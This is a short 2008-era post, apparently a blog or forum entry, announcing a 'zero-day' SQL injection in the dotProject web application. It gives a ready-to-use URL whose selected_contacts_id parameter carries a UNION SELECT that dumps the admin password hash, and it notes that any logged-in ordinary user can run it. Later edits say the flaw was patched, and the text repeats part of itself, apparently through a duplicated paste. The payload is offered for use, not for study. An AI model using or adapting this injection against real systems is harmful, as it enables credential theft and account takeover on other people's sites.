Dotproject Exploit ( 0day )
Dotproject is a web based project management software based on LAMP. The following url will give out the admin password hash.
http://site.com/dotproject/index.php?m=public&a=contact_selector&selected_contacts_id=1)%20union%20select%20user_password%20from%20users%20where%20user_id=1/*
This can be exploited from an ordinary user account, but you need to login first.
Clarification (1-14-08)
Fixed the misplaced the asterisk symbol (*) on the original link.
Edit ( 1-30-08 )
Patched na daw. Follow the thread
http://site.com/dotproject/index.php?m=public&a=contact_selector&selected_contacts_id=1)%20union%20select%20user_password%20from%20users%20where%20user_id=1/*
This can be exploited from an ordinary user account, but you need to login first.
Clarification (1-14-08)
Fixed the misplaced the asterisk symbol (*) on the original link.
Edit ( 1-30-08 )
Patched na daw. Follow the thread
